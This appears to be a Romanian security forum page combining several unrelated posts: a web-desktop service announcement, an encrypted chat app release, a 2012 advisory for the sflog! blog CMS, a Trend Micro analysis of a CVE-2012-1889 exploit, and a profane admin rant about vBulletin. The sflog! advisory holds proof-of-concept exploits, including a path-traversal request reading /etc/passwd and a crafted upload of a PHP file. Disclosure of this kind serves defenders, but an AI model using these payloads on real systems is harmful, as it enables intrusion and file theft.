Leaderboard

Ce este PoS? PoS este o platforma web bazata pe sistemul de operare desktop creeat special pentru comunitatea RST (Romanian Security Team) inspirat dintr-un opensource. In multe feluri, este un sistem de operare desktop complet, cu management de fisiere si aplicatii, care functioneaza intr-un mediu draggable cu ferestre redimensionabile. Prezentare generala Asa cum am spus mai inainte, PoS ofera un desktop complet, cu o suita de aplicatii intr-un sistem care poate fi accesat online, prin intermediul unui browser web. Este un sistem care poate furniza o flota de calculatoare in retea in mediul Cloud, de asemena poate fi un refugiu personal atunci cand utilizati computerul altcuiva. Atunci cand se investigheaza un sistem, cum ar fi PoS, cei mai multi oameni vor intreba despre performanta. Asa cum era de asteptat, lansarea aplicatiilor si viteza de executie sunt rapide, comparativ cu restul sistemelor de operare desktop in sistem cloud. Cu toate acestea, daca te gandesti la asta, PoS ofera un sistem ce poate fi comparat cu un PC online, de aici si numele PoS (Personal Online System). Deci, care sunt avantajele? Ei bine, implicit ofera o gama larga de aplicatii, inclusiv un calendar, un cititor RSS, un client de e-mail, un procesor de texte, o foaie de calcul, un manager de contacte, client FTP si SSH, jocuri, broswer anonim, music player, video player, radio, picture viewer, picture editor, chat, messenger, share intr-e userii platformei, spatiu de 20 giga pentru useri si 50 giga pentru VIP-uri, sistem de management cu facilitatile necesare pentru a incarca si descarca fisiere. ***ATENTIE*** Nu se retin nici un fel de loguri sau ip-uri, absolut orice sesiune este anonima iar toate fisierele din conturile dumneavoastra sunt private si accesibile doar dumneavoastra. Site-ul PoS: www.p-o-s.org Poze: gra?ie: ps-axl, DarkyAngel

Salut, va prezint o mica aplicatie la care lucrez de ceva vreme. Inainte de toate tin sa multumesc lui Nytro si lui Python3 pentru ca mi-au raspuns la cateva intrebari. In mare ce face programul asta al meu? E un program de chat. Conectarea se face direct ip la ip. Setezi catre ce ip vrei sa te conectezi, pe ce port asculta cel cu care vrei sa vorbesti si dai connect. Simplu ca buna ziua. The twist? Ceea ce se trimite este criptat cu o cheie publica - algoritmul utilizat? RSA. De asemenea pentru siguranta transmisiei messajul este codat si cu base64 dupa cryptarea cu cheia publica. Cheia publica si cea privata sunt generate la pornirea aplicatiei si cea publica este criptata in base64 si trimia catre persoana care vorbim atunci cand se initializeaza conexiunea catre aceasta. Aviz totusi celor care folosesc routere - o sa va dea eroare ca portul este deja in utilizare, nu am avut cum sa testez dar tind sa cred ca trebuie facut port forwarding si totul ar trebui sa fie ok. Altfel puteti sa modificati programul sa nu mai porneasca serverul si doar sa il folositi sa va conectati la alte persoane Va atasez atat un proiect pentru windows cat si pentru linux - testat pe debian, pe ambele sisteme s-a folosit IDE-ul code blocks. Pentru versiunea de windows veti avea nevoie sa compilati libraria wxWidgets versiunea 2.8.12, librari statice, unicode, debug si release, si libraria crypo++ de asemena tot librarie statica, sau puteti direct folosi executabilul din folderul release alaturi de dll-ul de langa el. Pentru linux am folosit libraria wxWidgets2.8.10 cea din repositoriy-ul debian, si librarya crypto++ tot din acelasi repository al debian 6(squeeze). Atat proiectu de linux cat si cel de windows au deja compilate versiunea de release si de debug totusi pe linux s-ar putea sa nu il puteti rula daca nu aveti librariile wxWidgets si crypo++ instalate. Link Proiect Windows RO Link Proiect Linux RO Link English windows project Link English linux project Sper sa va placa si sa va fie de folos. Totusi o avertizare, la fel ca si ssl-ul aplicatia este vulnerabila unui atac man in the middle, totusi pentru siguranta de zi cu zi atat timp cat cineva nu incearca expre sa vada ce vorbiti, sunteti in siguranta. Din ce m-am documentat brutforce asupra unei key rsa este dificil de executat asa ca ar trebui sa fie ok. Eng short vers: I present you a simple ip to ip chat application. It connects by giving to the application the ip of the person you wish to talk to. Above you have the links for the english version of the application. The communication between the applications is done encrypted using a rather big RSA key. Be aware that the application is vulnerable to a man in the middle attack. Also if you have a router you will not be able to listen on any port without port forwarding. One way to work around this is to modify the project so that the mpSockServ is never initalized, this way you can only connect to other people, but you will be able to use the application behind a router. To successfully compile the application you will need the wxWidgets library version 2.8.12 or above compiled with with unicode, as static link library, both release and debug, and crypto++ library also as static link library. On linux the libraries from the debian squeeze repository ware used. Le: Fixed, intrasem printr-un proxy online si a modificat link-ul. Acum ar trebui sa fie ok. Le2: Am adaugat si proiectul pentru pentru interfata in limba engleza, atat versiune pentru windows cat si linux

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2012-07-05 ] ################################################# # [ sflog! <= 1.00 ] Multiple Vulnerabilities # ################################################# # # Script: "sflog! is a flat and light CMS::Blog system." # # Vendor: http://sourceforge.net/projects/sflog/ # Download: http://sourceforge.net/projects/sflog/files/sflog/ # # # [ LFI ] # # PoC: http://localhost/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd # # File: ./sflog/index.php (lines: 1, 53) # ..cut.. # 1 <?php include("./includes/pageHeader.inc.php"); ?> // 1 # ..cut.. # # 53 require_once("./includes/entries.inc.php"); // 4 # ..cut.. # # File: ./sflog/includes/pageHeader.inc.php (lines: 20, 35) # ..cut.. # 20 $_blogID = $_GET['blog']; // 2 # ..cut.. # # 35 $_sectionID = $_GET['section']; // 3 # ..cut.. # # File: ./sflog/includes/entries.inc.php (lines: 2-11) # ..cut.. # 2 include_once("./cms/BlogEntry.class.php"); // 5 # 3 include_once("./cms/Blog.class.php"); # 4 $blog = new BlogEntry($_blogID,$_sectionID); // 6 # 5 $cms = new Blog(); # 6 $pages = $cms->getPostPerPage($_blogID); # 7 # 8 // checks for permalink # 9 if (isset($_GET['permalink'])){ # 10 $_permalink = $_GET['permalink']; // 8 # 11 $blog->showEntry($_permalink); // 9 # ..cut.. # # File: ./sflog/cms/BlogEntry.class.php (lines: 37-85) # ..cut.. # 37 class BlogEntry { # ..cut.. # 47 function BlogEntry($blogID,$sectionID){ // 7 # 48 error_reporting(E_USER_ERROR); // # 49 $this->blogID = $blogID; // # 50 $this->sectionID = $sectionID; // # 51 } # ..cut.. # 57 function showEntry($entryID){ // 10 # ..cut.. # 60 $JournalContentDir = "./blogs/".$this->blogID."/data/".$this->sectionID; // 11 # ..cut.. # 80 $JournalContent = $JournalContentDir."/".$entryID; // 12 # ..cut.. # 83 include_once $JournalContent; // 13 [LFI] # ..cut.. # ################################################# # [ Admin Password Disclosure ] # # PoC: http://localhost/sflog/admin/passwd # ################################################# # [ Arbitrary File Upload ] # # File: ./sflog/admin/includes/uploadContent.inc.php (lines: 62-72) # ..cut.. # 62 if (trim($_FILES['fileID']['name'])!=''){ # 63 $uploaddir = BLOG_PATH.$blogID.BLOG_UPLOADS; # 64 $uploadfile = $uploaddir . basename($_FILES['fileID']['name']); # 65 echo '<pre>'; # 66 if (move_uploaded_file($_FILES['fileID']['tmp_name'], $uploadfile)) { # 67 print(UPLOAD_SUCCESS); # 68 } else { # 69 print('<font color="red">'.UPLOAD_FAILED.'</font>'); # 70 } # 71 print "</pre>"; # 72 } # ..cut.. # # PoC: # # POST /sflog/admin/includes/uploadContent.inc.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: pl,en-us;q=0.7,en;q=0.3 # Accept-Encoding: gzip, deflate # Connection: keep-alive # Content-Type: multipart/form-data; boundary=---------------------------4827543632391 # Content-Length: 411 # -----------------------------4827543632391 # Content-Disposition: form-data; name="blogID" # # admin # -----------------------------4827543632391 # Content-Disposition: form-data; name="MAX_FILE_SIZE" # # 0 # -----------------------------4827543632391 # Content-Disposition: form-data; name="fileID"; filename="info.php" # Content-Type: text/x-php # # <?php phpinfo(); ?> # # -----------------------------4827543632391-- # # # Uploaded file will be here: http://localhost/sflog/blogs/admin/uploads/info.php # ### [ dun / 2012 ] ##################################################### Sursa

Last month, Microsoft released a fix tool in order to address a vulnerability in Microsoft XML Core Services. The said vulnerability, according to the Microsoft Security Advisory, could allow remote code execution if a user views a specifically crafted webpage using Internet Explorer. It has been given the identifier CVE-2012-1889. Since the vulnerability exists in Microsoft XML Core Services by way of IE, which is installed on most of PCs in the world, we assume that this attack code would give users the extremely big impact once it is exploited by malicious users. Another factor that would contribute to is impact is the fact that its attack code was made public. In line with this, we’d like to share the results of our analysis of a malware which exploits CVE-2012-1889. Trend Micro products detect this particular malware as HTML_EXPLOYT.AE. HTML_EXPLOYT.AE Overview HTML_EXPLOYT.AE may arrive in a system through a variety of means, such as email or a malicious website. It attempts to exploit CVE-2012-1889 via Internet Explorer. It should be noted that this specific exploit does not have a function to bypass DEP (Data Execution Prevention). If HTML_EXPLOYT.AE runs on an Internet Explorer with DEP enabled, it causes IE to crash. However, considering that the attack code for this exploit has been released in the wild, it is possible that we will see a sample that can bypass DEP and ASLR. HTML_EXPLOYT.AE has three main features, which we will discuss in a 3-part blog series. For part 1, we will discuss the usage of Microsoft XML Core Services. HTML_EXPLOYT.AE Feature 1: Usage of Microsoft XML Core Services HTML_EXPLOYT.AE uses object element by using Classid to exploit Microsoft XML Core Services. Specifically, HTML_EXPLOYT.AE exploits CVE-2012-1889 by referring to uninitialized object. In order to confirm the root cause of CVE-2012-1889 vulnerability, it is better to check how this code has been used in normally. So here we have the code to exploit CVE-2012-1889, with the heap spray codes deleted: Now let’s check the vulnerable code above when executed normally: The upper [eax] points to an object by a virtual function of “msxml3!Document::`vftable”” and[ ecx+18h] point to the “msxml3!Document::weakRelease” function. Its vftable is the following: From this we can see that the exploit HTML_EXPLOYT.AE takes advantage of the Microsoft XML Core Service (mxml3.dll) vulnerability. Internet Explorer Microsoft XML Core Service (mxml3.dll) uses this module in order to process HTML/XML codes making this program and other applications that uses this module, vulnerable to this attack. Based on this, we can conclude that it is possible for attackers to use other vectors in order to exploit the Microsoft XML Core Service vulnerability. Trend Micro protects users from this threat via Smart Protection Network™, which detects and deletes HTML_EXPLOYT.AE. Furthermore, Deep Security prevents attacks exploiting CVE-201-1889 via IDF rule 1005061- Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889). In the second installation of our 3-part series about this exploit, we will share our findings regarding the second feature of HTML_EXPLOYT.AE: Heap Spray. Sursa: http://blog.trendmicro.com/technical-analysis-of-cve-2012-1889-exploit-html_exployt-ae-part-1/

Am facut upgrade la ultima versiune de vBulletin si s-a futut mare parte din forum. Practic muistii facusera o pizda bleaga numita "Activity stream" care e un cacat ca cel de pe Facebook. Problema e ca aici aparea un singur post, facut de mine de proba dupa instalare, NU se puteau vedea categoriile, nimic. Am lasat vechea functionalitate pana vorbesc cu muistii aia milogi de la vBulletin. Probleme: - nu se incarca ckeditor, deci nu se va formata textul postat, nu se vor pune nici Enter-urile - nu se poate selecta un alt template - probabil altele Am lasat asa momentan pentru a fi inca functional. Voi incerca sa repar problemele. MUIE vBulletin, nu folositi rahatul asta, nici nulled, si nici in ruptul capului sa nu dati 2 lei pe el. If someone from vBulletin staff reads this: FUCK YOU. Postati eventuale alte probleme aici. Imi cer scuze pentru neplaceri si imi bag pula in vBulletin. // Nytro